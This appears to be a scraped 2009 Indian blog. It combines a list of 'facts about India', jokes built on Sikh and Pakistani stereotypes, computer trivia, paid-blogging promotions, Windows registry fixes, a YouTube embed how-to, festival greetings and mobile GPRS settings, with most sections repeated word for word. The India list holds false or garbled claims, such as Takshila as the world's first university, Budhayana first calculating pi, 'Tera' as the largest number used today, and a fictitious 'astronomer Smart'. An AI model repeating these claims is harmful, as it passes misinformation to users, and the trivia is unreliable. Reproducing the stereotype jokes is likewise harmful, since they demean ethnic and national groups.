• The World's First Granite Temple is the Brihadeswara temple at Tanjavur in Tamil Nadu. The shikhara is made from a single ' 80-tonne ' piece of granite. Also, this magnificient temple was built in just five years, (between 1004 AD and 1009 AD) during the reign of Rajaraja Chola
• India is.......the Largest democracy in the world, the 6th largest country in the world AND one of the most ancient and living civilizations (at least 10, 000 years old).
• The game of snakes & ladders was created by the 13th century poet saint Gyandev. It was originally called 'Mokshapat.' The ladders in the game represented virtues and the snakes indicated vices. The game was played with cowrie shells and dices. Later through time, the game underwent several modifications but the meaning is the same i.e good deeds take us to heaven and evil to a cycle of re-births.
• The world's highest cricket ground is in Chail, Himachal Pradesh.
• Built in 1893 after levelling a hilltop, this cricket pitch is 2444 meters above sea level.
• India has the most post offices in the world !
• The largest employer in the world is the Indian railway system, employing over a million people !.
• The World's first university was established in Takshila in 700 BC. More than 10,500 students from all over the world studied more than 60 subjects. The University of Nalanda built in the 4th century was one of the greatest achievements of ancient India in the field of education.
• Ayurveda is the earliest school of medicine known to mankind. The father of medicine, Charaka, consolidated Ayurveda 2500 years ago.
• Although modern images & descriptions of India often show poverty, India was one of the richest countries till the time of British in the early 17th Century. Christopher Columbus was attracted by India's wealth and was looking for route to India when he discovered America by mistake.
• The art of Navigation & Navigating was born in the river Sindh 6000 over years ago. The very word 'Navigation' is derived from the Sanskrit word NAVGATIH. The word navy is also derived from the Sanskrit word 'Nou'.
• Bhaskaracharya rightly calculated the time taken by the earth to orbit the sun hundreds of years before the astronomer Smart. His calculations was - Time taken by earth to orbit the sun: ( 5th century ) 365.258756484 days.
• The value of "pi" was first calculated by the Indian Mathematician Budhayana, and he explained the concept of what is known as the Pythagorean Theorem. He discovered this in the 6th century, which was long before the European mathematicians.
• Algebra, trigonometry and calculus also orignated from India. Quadratic equations were used by Sridharacharya in the 11th century. The largest numbers the Greeks and the Romans used were 106 whereas Hindus used numbers as big as 10*53 ( i.e 10 to the power of 53 ) with specific names as early as 5000 B.C. during the Vedic period. Even today, the largest used number is Tera: 10*12( 10 to the power of 12 ).
• Until 1896, India was the only source for diamonds to the world. ( Source . Gemological Institute of America )
• The Baily Bridge is the highest bridge in the world. It is located in the Ladakh valley between the Dras and Suru rivers in the Himalayan mountains. It was built by the Indian Army in August 1982.
• Sushruta is regarded as the father of surgery. Over 2600 years ago Sushrata & his team conducted complicated surgeries like cataract, artificial limbs, cesareans, fractures, urinary stones and also plastic surgery and brain surgeries.
• Usage of anesthesia was well known in ancient India medicine. Detailed knowledge of anatomy, embryology, digestion, metabolism, physiology, etiology, genetics and immunity is also found in many ancient Indian texts.
• INDIA has been called Bharat even in Satya yuga ( Golden Age )
• The name `India’ is derived from the River Indus, the valleys around which were the home of the early settlers. The Aryan worshippers referred to the river Indus as the Sindhu.
• The Persian invaders converted it into Hindu. The name `Hindustan’ combines Sindhu and Hindu and thus refers to the land of the Hindus.
• The number system was invented by India. Aryabhatta was the scientist who invented the digit zero.
• Sanskrit is considered as the mother of all higher languages. This is because it is the most precise, and therefore suitable language for computer software. ( a report in Forbes magazine, July 1987 ).
• Chess was invented in India.
• Algebra, Trigonometry and Calculus are studies which originated in India.
• The' place value system' and the 'decimal system' were developed in 100 BC in India.
• The first six Mogul Emperor's of India ruled in an unbroken succession from father to son for two hundred years, from 1526 to 1707.
• The World's First Granite Temple is the Brihadeswara temple at Tanjavur in Tamil Nadu. The shikhara is made from a single ' 80-tonne ' piece of granite. Also, this magnificient temple was built in just five years, (between 1004 AD and 1009 AD) during the reign of Rajaraja Chola
• India is.......the Largest democracy in the world, the 6th largest country in the world AND one of the most ancient and living civilizations (at least 10, 000 years old).
• The game of snakes & ladders was created by the 13th century poet saint Gyandev. It was originally called 'Mokshapat.' The ladders in the game represented virtues and the snakes indicated vices. The game was played with cowrie shells and dices. Later through time, the game underwent several modifications but the meaning is the same i.e good deeds take us to heaven and evil to a cycle of re-births.
• The world's highest cricket ground is in Chail, Himachal Pradesh.
• Built in 1893 after levelling a hilltop, this cricket pitch is 2444 meters above sea level.
• India has the most post offices in the world !
• The largest employer in the world is the Indian railway system, employing over a million people !.
• The World's first university was established in Takshila in 700 BC. More than 10,500 students from all over the world studied more than 60 subjects. The University of Nalanda built in the 4th century was one of the greatest achievements of ancient India in the field of education.
• Ayurveda is the earliest school of medicine known to mankind. The father of medicine, Charaka, consolidated Ayurveda 2500 years ago.
• Although modern images & descriptions of India often show poverty, India was one of the richest countries till the time of British in the early 17th Century. Christopher Columbus was attracted by India's wealth and was looking for route to India when he discovered America by mistake.
• The art of Navigation & Navigating was born in the river Sindh 6000 over years ago. The very word 'Navigation' is derived from the Sanskrit word NAVGATIH. The word navy is also derived from the Sanskrit word 'Nou'.
• Bhaskaracharya rightly calculated the time taken by the earth to orbit the sun hundreds of years before the astronomer Smart. His calculations was - Time taken by earth to orbit the sun: ( 5th century ) 365.258756484 days.
• The value of "pi" was first calculated by the Indian Mathematician Budhayana, and he explained the concept of what is known as the Pythagorean Theorem. He discovered this in the 6th century, which was long before the European mathematicians.
• Algebra, trigonometry and calculus also orignated from India. Quadratic equations were used by Sridharacharya in the 11th century. The largest numbers the Greeks and the Romans used were 106 whereas Hindus used numbers as big as 10*53 ( i.e 10 to the power of 53 ) with specific names as early as 5000 B.C. during the Vedic period. Even today, the largest used number is Tera: 10*12( 10 to the power of 12 ).
• Until 1896, India was the only source for diamonds to the world. ( Source . Gemological Institute of America )
• The Baily Bridge is the highest bridge in the world. It is located in the Ladakh valley between the Dras and Suru rivers in the Himalayan mountains. It was built by the Indian Army in August 1982.
• Sushruta is regarded as the father of surgery. Over 2600 years ago Sushrata & his team conducted complicated surgeries like cataract, artificial limbs, cesareans, fractures, urinary stones and also plastic surgery and brain surgeries.
• Usage of anesthesia was well known in ancient India medicine. Detailed knowledge of anatomy, embryology, digestion, metabolism, physiology, etiology, genetics and immunity is also found in many ancient Indian texts.
SARDARJI AND PAKISTANI JOKE
A Pakistani man, a lady and a Sardarji were traveling in a train one time. The train was going through a long tunnel and while in the dark suddenly there is a sound of a big kiss, which is followed by the sound of a slap.
When the train comes out of the tunnel, everyone sees that the Pakistani guys cheek is swollen red.
Now, the Pakistani looks around confused and thinks," That sardarji must have tried to kiss the lady and she slapped me instead of him."
The lady wonders, "That Pakistani guy must have been trying to kiss me and must have kissed the sardarji by mistake!"
And our dear & wicked Sardarji is thinking, "I hope we run into another tunnel so I can make another kissing sound and slap the damn Pakistani!"
When the train comes out of the tunnel, everyone sees that the Pakistani guys cheek is swollen red.
Now, the Pakistani looks around confused and thinks," That sardarji must have tried to kiss the lady and she slapped me instead of him."
The lady wonders, "That Pakistani guy must have been trying to kiss me and must have kissed the sardarji by mistake!"
And our dear & wicked Sardarji is thinking, "I hope we run into another tunnel so I can make another kissing sound and slap the damn Pakistani!"
Some Computer Based General knowledge
Hi I would like to share some of kool tech facts:-
(1). An Amd 1400 chip running without a heatsink gets as hot as 370 degrees.
(2). Seagate introduced the first hdd for pcs in 1979.It held 5 M.B of data.
(3). If u opened up the case of the original Macintosh, u will find 47 signatures
one for each member of Apple's Macintosh divison as of 1982.
(4). The first computer company to register for a domain name was digital
equipment corporation.
(5). Did u know Apple & Sun came very close to a merger in 1996.
(6). The technology contained in a single game boy unit in 2000 exceeds all
the computing power that was used to put the first man on moon in 1969.
(7). Hewlett Packard was started at a garage in Palo Alto in 1939.
(1). An Amd 1400 chip running without a heatsink gets as hot as 370 degrees.
(2). Seagate introduced the first hdd for pcs in 1979.It held 5 M.B of data.
(3). If u opened up the case of the original Macintosh, u will find 47 signatures
one for each member of Apple's Macintosh divison as of 1982.
(4). The first computer company to register for a domain name was digital
equipment corporation.
(5). Did u know Apple & Sun came very close to a merger in 1996.
(6). The technology contained in a single game boy unit in 2000 exceeds all
the computing power that was used to put the first man on moon in 1969.
(7). Hewlett Packard was started at a garage in Palo Alto in 1939.
Tuesday, October 20, 2009
Letter to bill gates by banta singh
Dear Mr Bill Gates,
This letter is from Banta Singh. We have
bought a computer for
our home and we found problems, which I want to bring
to your notice.
After connecting to internet we planned to open e-mail
account and whenever
we fill the form in Hotmail in the password column,
only ****** appears,
but
in the rest of the fields whatever we typed appears,
but we face this
problem only in password field. We checked with
hardware vendor Santa Singh
and he said that there is no problem in keyboard.
Because of this we open
the e-mail account with password *****. I request you
to check this as we
ourselves do not know what the password is.
We are unable to enter anything after we click the
shut down button.
There is a button 'start' but there is no stop button.
We request you to
check this.
We find there is 'Run' in the menu. One of my friend
clicked 'run' has ran
upto Amritsar! So, we request you to change that to
sit so that we can
click
that by sitting.
One doubt is that any 're-scooter' available in
system? As I find only
're-cycle', but I own a scooter at my home.
Also there is 'Find' button but it is not working
properly. My wife lost
the
door key and we tried a lot for tracing the key with
this 'find', but
unable
to trace. Is it a bug??
Thanks,
Banta Singh
This letter is from Banta Singh. We have
bought a computer for
our home and we found problems, which I want to bring
to your notice.
After connecting to internet we planned to open e-mail
account and whenever
we fill the form in Hotmail in the password column,
only ****** appears,
but
in the rest of the fields whatever we typed appears,
but we face this
problem only in password field. We checked with
hardware vendor Santa Singh
and he said that there is no problem in keyboard.
Because of this we open
the e-mail account with password *****. I request you
to check this as we
ourselves do not know what the password is.
We are unable to enter anything after we click the
shut down button.
There is a button 'start' but there is no stop button.
We request you to
check this.
We find there is 'Run' in the menu. One of my friend
clicked 'run' has ran
upto Amritsar! So, we request you to change that to
sit so that we can
click
that by sitting.
One doubt is that any 're-scooter' available in
system? As I find only
're-cycle', but I own a scooter at my home.
Also there is 'Find' button but it is not working
properly. My wife lost
the
door key and we tried a lot for tracing the key with
this 'find', but
unable
to trace. Is it a bug??
Thanks,
Banta Singh
Genuine Ways To Earn Money Online From Your Blog.
Hi, today I want to write about sites which provides paid review opportunities on your blog. I am earning from these services, these services are based on Paid To Blog. Most of the services pays through PayPal. There are minimum requirements for each service to get approve your blog Most common are
• Your blog must contain maximum posts of unique content.
• Your blog must not be completely automated or appear to be created solely for search engine traffic.
• Your blog must be updated once in a week.
• Your blog must be older than 90 days and have at least 30 posts to apply.
• Your blog must have a professional appearance.
It is good if your Blog has Google PageRank and a good Alexa rank. You can make most of it.
SponsoredReviews: Sponsored Reviews is a marketplace which lets you see paid reviews on your blog. Once you get approved from this site then you can start earning money easily. There are wide range of advertisers present and they provide a range of money that they wish to pay for your review. And you have to provide your maximum bid for your blog. Generally your blog is rated considering 3 features. They are yahoo backlinks, technorati and alexa.
You will get 65% of the bid amount. That is if you take the task for $10 then earn $6.50 and the remaining goes for the site. So in total this is a great site to earn money online by blogging and you can even earn more than $300 per review.
PayPerPost:
The controversial ad network which got into trouble with Google, PayPerPost remains a popular way for bloggers to make money through their blog. If you are a good blogger who likes to update your blog then this is a great opportunity for you. You need to have a blog which is three months old and should be updated regularly. Really this site will give you the best opportunity that you find on the Internet. So if you really want to earn good money with your blog then don't think of joining this later.
Smorty:
Smorty is another get paid for blogging site similar like payperpost. But there are some advantags in smorty which makes it unique. You will be paid weekly, which is very quick when compared to other paid to blog sites. Opportunities are directly sent to admin panel and as well as emails. Hence you dont need to check back frequently about the opportunities. So your 15 minutes time earns you money along with some good content to your blog. Your blog need not require higher PR for getting approved. Only a good blog, indexed in google with some good content and updated regularly is fine.
LinkWorth:
LinkWorth have a wide range of ways for you to make money through your blog including text and banner ad sales, in text advertising and paid reviews.
Join BidVertiser now and they will turn your advertising space into cash! Simply display the BidVertiser text ads on your website and let advertisers bid against each other!
If you have been banned from Google Adsense or wish to extend your publisher revenue, BidVertiser is just a perfect option
SocialSpark:
SocialSpark offers bloggers a variety of ways to make money through their blog. You can review products, websites and services and you can display sponsors ads on a per day basis.
• Your blog must contain maximum posts of unique content.
• Your blog must not be completely automated or appear to be created solely for search engine traffic.
• Your blog must be updated once in a week.
• Your blog must be older than 90 days and have at least 30 posts to apply.
• Your blog must have a professional appearance.
It is good if your Blog has Google PageRank and a good Alexa rank. You can make most of it.
SponsoredReviews: Sponsored Reviews is a marketplace which lets you see paid reviews on your blog. Once you get approved from this site then you can start earning money easily. There are wide range of advertisers present and they provide a range of money that they wish to pay for your review. And you have to provide your maximum bid for your blog. Generally your blog is rated considering 3 features. They are yahoo backlinks, technorati and alexa.
You will get 65% of the bid amount. That is if you take the task for $10 then earn $6.50 and the remaining goes for the site. So in total this is a great site to earn money online by blogging and you can even earn more than $300 per review.
PayPerPost:
The controversial ad network which got into trouble with Google, PayPerPost remains a popular way for bloggers to make money through their blog. If you are a good blogger who likes to update your blog then this is a great opportunity for you. You need to have a blog which is three months old and should be updated regularly. Really this site will give you the best opportunity that you find on the Internet. So if you really want to earn good money with your blog then don't think of joining this later.
Smorty:
Smorty is another get paid for blogging site similar like payperpost. But there are some advantags in smorty which makes it unique. You will be paid weekly, which is very quick when compared to other paid to blog sites. Opportunities are directly sent to admin panel and as well as emails. Hence you dont need to check back frequently about the opportunities. So your 15 minutes time earns you money along with some good content to your blog. Your blog need not require higher PR for getting approved. Only a good blog, indexed in google with some good content and updated regularly is fine.
LinkWorth:
LinkWorth have a wide range of ways for you to make money through your blog including text and banner ad sales, in text advertising and paid reviews.
Join BidVertiser now and they will turn your advertising space into cash! Simply display the BidVertiser text ads on your website and let advertisers bid against each other!
If you have been banned from Google Adsense or wish to extend your publisher revenue, BidVertiser is just a perfect option
SocialSpark:
SocialSpark offers bloggers a variety of ways to make money through their blog. You can review products, websites and services and you can display sponsors ads on a per day basis.
Show Hidden Files and Folders not working?
Show Hidden Files and Folders not working?..... If we selecte the radio button “Show hidden files and folders” and then press Ok.. the changes would just disappear upon opening the dialog again. It was probably some virus attack after which the Windows registry was not being updated properly. So here is what methods to restore it back. There are so many methods to restore back the registry. If one method is not working, please try another one.
Method 1:
Go to registry editor by running regedit in the run box.
Go to this key:
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer\Advanced
In the right hand area, double click hidden and change the value to 1.
Now you’re all set to go. Check it in your tools menu if the changes have taken effect.
Method 2:
1. Click “Start” -> “Run…” (or press Windows key + R)
2. Type “regedit” and click “Ok”.
3. Find the key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Advanced\Folder\Hidden\SHOWALL
4. Look at the “CheckedValue” key… This should be a DWORD key. If it isn’t, delete the key.
5. Create a new key called “CheckedValue” as a DWORD (hexadecimal) with a value of 1.
6. The “Show hidden files & folders” check box should now work normally. Enjoy!
Method 1:
Go to registry editor by running regedit in the run box.
Go to this key:
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer\Advanced
In the right hand area, double click hidden and change the value to 1.
Now you’re all set to go. Check it in your tools menu if the changes have taken effect.
Method 2:
1. Click “Start” -> “Run…” (or press Windows key + R)
2. Type “regedit” and click “Ok”.
3. Find the key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Advanced\Folder\Hidden\SHOWALL
4. Look at the “CheckedValue” key… This should be a DWORD key. If it isn’t, delete the key.
5. Create a new key called “CheckedValue” as a DWORD (hexadecimal) with a value of 1.
6. The “Show hidden files & folders” check box should now work normally. Enjoy!
Speedup Your Folder Browsing.
You may have noticed that everytime you open my computer to browse folders that there is a slight delay. This is because Windows XP automatically searches for network files and printers everytime you open Windows Explorer. To fix this and to increase browsing significantly:
1. Open My Computer
2. Click on Tools menu
3. Click on Folder Options
4. Click on the View tab.
5. Uncheck the Automatically search for network folders and printers check box
6. Click Apply
7. Click Ok
8. Reboot your computer
1. Open My Computer
2. Click on Tools menu
3. Click on Folder Options
4. Click on the View tab.
5. Uncheck the Automatically search for network folders and printers check box
6. Click Apply
7. Click Ok
8. Reboot your computer
HOW TO ADD YOUTUBE VIDEO IN YOUR BLOG
YouTube has all sorts of interesting, funny, silly, and provocative content. One of the most appealing things about YouTube is how easy it is to share this content with others. You can easily embed any video on YouTube into your own blog. Here's how you do it.
First, go to YouTube and find a video that you like. It doesn't have to be a video that you created.
Next, look for the box directly to the right of the video. Not only does this box let you subscribe to videos, it also gives you the code for embedding video. Go to the line marked Embed at the bottom of this box. Click inside the code box next to the word Embed. All of the code text should automatically be highlighted. If not, you'll need to select it. Copy this code. You can copy by right-clicking on your mouse and selecting copy from the drop-down menu.
Next, you need to paste this code into your blog. For this tutorial, I will use Blogger, which is a free blogging service from Google.
Log into your Blogger account and compose a new message for your blog. Select the edit HTML tab, and paste the code you copied from YouTube. It is important to make sure you have the HTML tab selected first. You can paste the code by right-clicking and selecting paste from the drop-down menu
That's it. Press the post button and then preview your blog, to make sure everything works. When readers look at your blog, they'll see the embedded video, and they can click on the play button in the center to view the video.
It is possible to modify the HTML code so that the video automatically plays as soon as it is loaded, instead of making the reader click. However, I don't recommend this. It is rude to readers who don't expect video, and it can really drag on users who have slow connections.
First, go to YouTube and find a video that you like. It doesn't have to be a video that you created.
Next, look for the box directly to the right of the video. Not only does this box let you subscribe to videos, it also gives you the code for embedding video. Go to the line marked Embed at the bottom of this box. Click inside the code box next to the word Embed. All of the code text should automatically be highlighted. If not, you'll need to select it. Copy this code. You can copy by right-clicking on your mouse and selecting copy from the drop-down menu.
Next, you need to paste this code into your blog. For this tutorial, I will use Blogger, which is a free blogging service from Google.
Log into your Blogger account and compose a new message for your blog. Select the edit HTML tab, and paste the code you copied from YouTube. It is important to make sure you have the HTML tab selected first. You can paste the code by right-clicking and selecting paste from the drop-down menu
That's it. Press the post button and then preview your blog, to make sure everything works. When readers look at your blog, they'll see the embedded video, and they can click on the play button in the center to view the video.
It is possible to modify the HTML code so that the video automatically plays as soon as it is loaded, instead of making the reader click. However, I don't recommend this. It is rude to readers who don't expect video, and it can really drag on users who have slow connections.
What is meant by mounting a drive?
Before your computer can use any kind of storage device (such as a hard drive, CD-ROM, or network share), you or your operating system must make it accessible through the computer's file system. This process is called mounting. You can access only files on mounted media.
Formats and mounting
Your computer stores data in specific, structured file formats. The format used depends on how your operating system is configured, but they all fulfill the same purpose. A file format is a specially coded template written on a piece of media (such as a disk or CD-ROM). Your computer reads the format to determine many things about the media: where data begins and ends, where data can be written, and how to read data that has already been written. If your computer does not recognize the file format on a piece of media, your computer will return errors. If you force your computer to work with media in a corrupted or unrecognized format, your computer will write data incorrectly, possibly rendering unrecoverable all the files stored on the media.
Mounting ensures that your computer recognizes the media's format, and instructs your computer to incorporate the media's filesystem into your local filesystem. If your computer cannot recognize the media format, the device cannot be mounted. When media is successfully mounted, your computer creates a mount point, a locally available link through which you access an external device. In Windows or Mac OS X, the mount point is represented by a picture of a CD-ROM or floppy disk, or other icon. In Unix or Linux, the mount point is a directory. Most operating systems handle mounting and unmounting for you.
Formats and mounting
Your computer stores data in specific, structured file formats. The format used depends on how your operating system is configured, but they all fulfill the same purpose. A file format is a specially coded template written on a piece of media (such as a disk or CD-ROM). Your computer reads the format to determine many things about the media: where data begins and ends, where data can be written, and how to read data that has already been written. If your computer does not recognize the file format on a piece of media, your computer will return errors. If you force your computer to work with media in a corrupted or unrecognized format, your computer will write data incorrectly, possibly rendering unrecoverable all the files stored on the media.
Mounting ensures that your computer recognizes the media's format, and instructs your computer to incorporate the media's filesystem into your local filesystem. If your computer cannot recognize the media format, the device cannot be mounted. When media is successfully mounted, your computer creates a mount point, a locally available link through which you access an external device. In Windows or Mac OS X, the mount point is represented by a picture of a CD-ROM or floppy disk, or other icon. In Unix or Linux, the mount point is a directory. Most operating systems handle mounting and unmounting for you.
Best Anti Microsoft, Pro Linux Quotes
1. UNIX is basically a simple operating system, but you have to be a genius to understand the simplicity — Dennis Ritchie
2. MICROSOFT = Most Intelligent Customers Realize Our Software Only Fools Teenagers
3. Windows had detected you do not have a keyboard. Press ‘F9″ to continue.
4. The box said ‘Requires Windows 95 or better’. So I installed LINUX
5. Software is like sex: It’s better when it’s free.
6. Unix, DOS and Windows…the good, the bad and the ugly.
7. Windows XP -now comes with free anger management courses.
8. I don’t care if the software I run is unstable crap, as long as it is the LATEST unstable crap.
9. Why do with one shortcut key what you can do with 5 mouse clicks? Welcome to Windows!
10. The box said ‘Requires Windows 95 or better’. So I installed LINUX.
2. MICROSOFT = Most Intelligent Customers Realize Our Software Only Fools Teenagers
3. Windows had detected you do not have a keyboard. Press ‘F9″ to continue.
4. The box said ‘Requires Windows 95 or better’. So I installed LINUX
5. Software is like sex: It’s better when it’s free.
6. Unix, DOS and Windows…the good, the bad and the ugly.
7. Windows XP -now comes with free anger management courses.
8. I don’t care if the software I run is unstable crap, as long as it is the LATEST unstable crap.
9. Why do with one shortcut key what you can do with 5 mouse clicks? Welcome to Windows!
10. The box said ‘Requires Windows 95 or better’. So I installed LINUX.
Friday, October 16, 2009
Thursday, October 15, 2009
Latest Dhanteras SMS
kan kan dipak
trin trin bati
hans chit1 ka
sneh pilati
pal pal ki
jilmil lao me
sapno ke ankur
aaj uga le
godhuli bela me
aaj dip jala le
may the light that we celebrate at diwali show us the way and lead us together on the path of peace and social harmony
"Happy Diwali"
Dinodin badhta jaye apka karobar bana rahe sneh aur pyar hoti rahe sada dhanki bochar, aisa ho apka DHANTERAS ka tyohar.
"HAPPY DHANTERAS"
May goddess Laxmi bless your business
to do well in spite of all odds like
the enduring charms of gold and diamonds
Happy Dhanteras
On Dhanteras Festival,
May Divine blessings of Goddess Lakshmi
Bestow on you bountiful fortune
Happy Dhanteras Wishes
May Dhanteras Festival
Wishing you with Wealth & Prosperity
As you journey towards greater success
Happy Dhanteras
On Dhanteras Occasion
Wishing you Wealth, Good Health,
Happiness and Prosperity
Dhanteras Wishes
trin trin bati
hans chit1 ka
sneh pilati
pal pal ki
jilmil lao me
sapno ke ankur
aaj uga le
godhuli bela me
aaj dip jala le
may the light that we celebrate at diwali show us the way and lead us together on the path of peace and social harmony
"Happy Diwali"
Dinodin badhta jaye apka karobar bana rahe sneh aur pyar hoti rahe sada dhanki bochar, aisa ho apka DHANTERAS ka tyohar.
"HAPPY DHANTERAS"
May goddess Laxmi bless your business
to do well in spite of all odds like
the enduring charms of gold and diamonds
Happy Dhanteras
On Dhanteras Festival,
May Divine blessings of Goddess Lakshmi
Bestow on you bountiful fortune
Happy Dhanteras Wishes
May Dhanteras Festival
Wishing you with Wealth & Prosperity
As you journey towards greater success
Happy Dhanteras
On Dhanteras Occasion
Wishing you Wealth, Good Health,
Happiness and Prosperity
Dhanteras Wishes
Tuesday, October 13, 2009
My New Blog For Chhattisgarh Shikshakarmi Exam Candidates
Click HERE to open my new blog for Chhattisgarh Shikshakarmi Exam Candidates
Free manual GPRS settings
Most of people have face problems regarding gprs settings on their mobile phones. I have been getting lots of public reviews about how to configure and where to get gprs setting, So I publish here most of gprs settings for most of mobile service operator (India) to enter in your phone mannulay. Here you have manual gprs settings for vodafone, hutch, idea, airtel, bsnl, airtel live, airtel mobile you can enter in your phone and configure mannually.
Manual Reliance Smart GPRS Settings:
Settings for SMARTWAP:
* Account name : SMARTWAP
* Access point name: SMARTWAP
* Home page: http://wap.rworld.co.in/gsm/index.wml
* Wapgateway proxy IP address: 97.253.29.199
* Port: 8080
Settings for SMATRNET:
* Account name: SMARTNET
* Access point name: SMARTNET
* Home page: http://www.google.co.in
* Wapgateway proxy IP address: 97.253.29.199
* Port: 8080
Settings for MMS:
* Account name: RTLMMS
* Access point name:MMS
* Homepage: http://10.114.0.5/mms/
* Wapgateway IP: 10.114.0.13
* Port: 9401
Manual Idea gprs Settings:
Account Name – idea_GPRS
Username – leave Blank
Password – leave Blank
Homepage – http://wap.ideafresh.com
Proxy and Server Port – 8080
Proxy and Server adress – 010.004.042.045
Databearer – GPRS / Packetdata
Acces Point Name – imis
Proxy – Enabled/yes
Authentication Type – Normal
Manual Hutch or Vodafone Essar gprs Settings:
Account Name – Vodafone Live
User Name – leave Blank
Password – leave Blank
Proxy – Enabled/yes
Access Point Name – portalnmms
Proxy – Enabled/yes.
Proxy and Server address – 010.010.001.100
Proxy and Server Port – 9401 or 8080
Homepage – http://live.vodafone.in
Authentication Type – Normal
Manual Airtel gprs Settings:
Account Name – Airtel_gprs
User Name – leave Blank
Password – leave Blank
Homepage – http://live.airtelworld.com
Proxy – Enabled/yes.
Proxy and Server Adress – 202.56.231.117
Proxy and Server Port – 8080
Data bearer – GPRS or Packet Data.
Access Point Name – airtelgprs.com
Authentication Type – Normal
Use preferred access point – No
Manual Airtel live settings
Account Name – Airtel_live
Homepage – http://live.airtelworld.com
Username – leave Blank
Password – leave Blank
Proxy – Enabled/yes
Proxy and Server Adress – 100.001.200.099
Accespoint Name – airtelfun.com
Proxy and Server Port – 8080
Data bearer – GPRS/ Packet Data
Authentication Type – Normal
Manual BPL gprs Settings:
Account Name – BPL WAP
Username – leave blank
Password – leave blank
Proxy – Enabled/yes
Homepage – http://wap.mizone.bplmobile.com
Proxy and Server address – 10.0.0.10
Proxy and Server Port – 8080
Acces Point Name – mizone
Data bearer – GPRS/ Packetdata
Authentication Type – Normal
Manual BSNL north gprs Settings:
Account Name – bsnlwap
Username – leave blank
Password – leave blank
Proxy – Enabled/yes
Homepage – http://wap.cellone.in
Proxy and Server address – 010.132.194.196
Proxy and Server Port – 8080
Acces Point Name – wapnorth.cellone.in
Data bearer – GPRS/ Packetdata
Authentication Type – Normal
Manual Idea Gprs Settings
Account Name – idea_GPRS
Username – Blank
Password – Blank
Homepage – http://wap.ideafresh.com
Proxy and Server Port – 8080
Proxy and Server adress – 10.4.42.45
Databearer – GPRS / Packetdata
Acces Point Name – imis
Proxy – Enabled/yes
Authentication Type – Normal
Manual Bsnl Gprs Settings
Account Name – BPL WAP
Username -
Password -
Proxy – Enabled/yes
Homepage – http://techarena.in
Proxy and Server address – 10.0.0.10
Proxy and Server Port – 8080
Acces Point Name – mizone
Data bearer – GPRS/ Packetdata
Authentication Type – Normal
Manual Hutch Gprs Settings
Account Name – Hutch_GPRS
User Name – Blank
Password – Blank
Proxy – Enabled/yes
Access Point Name – portalnmms
Full Internet Access Point Name – www
Proxy and Server address – 10.10.1.100
Proxy and Server Port – 8080
Homepage – http://hutchworld.co.in
Authentication Type – Normal
Manual Airtel live settings
Account Name – Airtel_live
Homepage – http://live.airtelworld.com
Username – Blank
Password – Blank
Proxy – Enabled/yes
Proxy and Server Adress – 100.1.200.99
Accespoint Name – airtelfun.com
Proxy and Server Port – 8080
Data bearer – GPRS/ Packet Data
Authentication Type – Normal
Manual Airtel Gprs Settings
Homepage – any page you want to set. (eg. http://techarena.in)
User Name – Blank
Password – Blank
Proxy – Enabled/yes.
Proxy and Server Adress – 202.56.231.117
Proxy and Server Port – 8080
Data bearer – GPRS or Packet Data.
Access Point Name – airtelgprs.com
Authentication Type – Normal
Use preferred access point – No
Manual Hutch Gprs Settings
1. Account Name – Hutch_GPRS
2. User Name – Blank
3. Password – Blank
4. Proxy – Enabled/yes
5. Access Point Name – portalnmms
6. Full Internet Access Point Name – www
7. Proxy and Server address – 10.10.1.100
8. Proxy and Server Port – 8080
9. Homepage – http://hutchworld.co.in
10. Authentication Type – Normal
Manual Airtel Gprs Settings
1. Homepage – any page you want to set.
2. User Name – Blank
3. Password – Blank
4. Proxy – Enabled/yes.
5. Proxy and Server Adress – 202.56.231.117
6. Proxy and Server Port – 8080
7. Data bearer – GPRS or Packet Data.
8. Access Point Name – airtelgprs.com
9. Authentication Type – Normal
10. Use preferred access point – No
Manual Airtel live settings
1. Account Name – Airtel_live
2. Homepage – http://live.airtelworld.com
3. Username – Blank
4. Password – Blank
5. Proxy – Enabled/yes
6. Proxy and Server Adress – 100.1.200.99
7. Accespoint Name – airtelfun.com
8. Proxy and Server Port – 8080
9. Data bearer – GPRS/ Packet Data
10. Authentication Type – Normal
Manual Idea Gprs Settings
1. Account Name – idea_GPRS
2. Username – Blank
3. Password – Blank
4. Homepage – http://wap.ideafresh.com
5. Proxy and Server Port – 8080
6. Proxy and Server adress – 10.4.42.45
7. Databearer – GPRS / Packetdata
8. Acces Point Name – imis
9. Proxy – Enabled/yes
10. Authentication Type – Normal
Manual Bsnl Gprs Settings
1. Account Name – BPL WAP
2. Username -
3. Password -
4. Proxy – Enabled/yes
5. Homepage – http://wap.mizone.bplmobile.com
6. Proxy and Server address – 10.0.0.10
7. Proxy and Server Port – 8080
8. Acces Point Name – mizone
9. Data bearer – GPRS/ Packetdata
10. Authentication Type – Normal
Manual Reliance Smart GPRS Settings:
Settings for SMARTWAP:
* Account name : SMARTWAP
* Access point name: SMARTWAP
* Home page: http://wap.rworld.co.in/gsm/index.wml
* Wapgateway proxy IP address: 97.253.29.199
* Port: 8080
Settings for SMATRNET:
* Account name: SMARTNET
* Access point name: SMARTNET
* Home page: http://www.google.co.in
* Wapgateway proxy IP address: 97.253.29.199
* Port: 8080
Settings for MMS:
* Account name: RTLMMS
* Access point name:MMS
* Homepage: http://10.114.0.5/mms/
* Wapgateway IP: 10.114.0.13
* Port: 9401
Manual Idea gprs Settings:
Account Name – idea_GPRS
Username – leave Blank
Password – leave Blank
Homepage – http://wap.ideafresh.com
Proxy and Server Port – 8080
Proxy and Server adress – 010.004.042.045
Databearer – GPRS / Packetdata
Acces Point Name – imis
Proxy – Enabled/yes
Authentication Type – Normal
Manual Hutch or Vodafone Essar gprs Settings:
Account Name – Vodafone Live
User Name – leave Blank
Password – leave Blank
Proxy – Enabled/yes
Access Point Name – portalnmms
Proxy – Enabled/yes.
Proxy and Server address – 010.010.001.100
Proxy and Server Port – 9401 or 8080
Homepage – http://live.vodafone.in
Authentication Type – Normal
Manual Airtel gprs Settings:
Account Name – Airtel_gprs
User Name – leave Blank
Password – leave Blank
Homepage – http://live.airtelworld.com
Proxy – Enabled/yes.
Proxy and Server Adress – 202.56.231.117
Proxy and Server Port – 8080
Data bearer – GPRS or Packet Data.
Access Point Name – airtelgprs.com
Authentication Type – Normal
Use preferred access point – No
Manual Airtel live settings
